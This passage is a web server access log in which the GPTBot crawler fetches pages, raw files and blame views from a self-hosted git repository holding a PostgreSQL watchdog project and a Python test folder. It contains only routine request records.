-[17/Feb/2026:13:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" [Client 74.7.227.38] [Length 12344] [Gzip 5.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" [Client 74.7.227.38] [Length 11652] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" [Client 74.7.227.38] [Length 11650] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" [Client 74.7.227.38] [Length 11618] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:13:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 44856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 36711] [Gzip 25.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" [Client 74.7.227.38] [Length 19730] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" -[17/Feb/2026:13:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" -[17/Feb/2026:13:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" [Client 74.7.227.38] [Length 11834] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" -[17/Feb/2026:13:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12239] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10943] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" [Client 74.7.227.38] [Length 19730] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" -[17/Feb/2026:13:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11628] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" -[17/Feb/2026:13:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" [Client 74.7.227.38] [Length 10135] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" -[17/Feb/2026:13:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11126] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11998] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" -[17/Feb/2026:13:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16158] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" -[17/Feb/2026:13:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10101] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" -[17/Feb/2026:13:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10195] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build" [Client 74.7.227.38] [Length 9827] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11782] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10379] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9879] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10151] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10169] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10373] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10423] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" -[17/Feb/2026:13:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10899] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build" [Client 74.7.227.38] [Length 10347] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build" -[17/Feb/2026:13:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" -[17/Feb/2026:13:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11681] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21163] [Gzip 10.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" -[17/Feb/2026:13:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10156] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9538] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10870] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" -[17/Feb/2026:13:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 17773] [Gzip 9.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 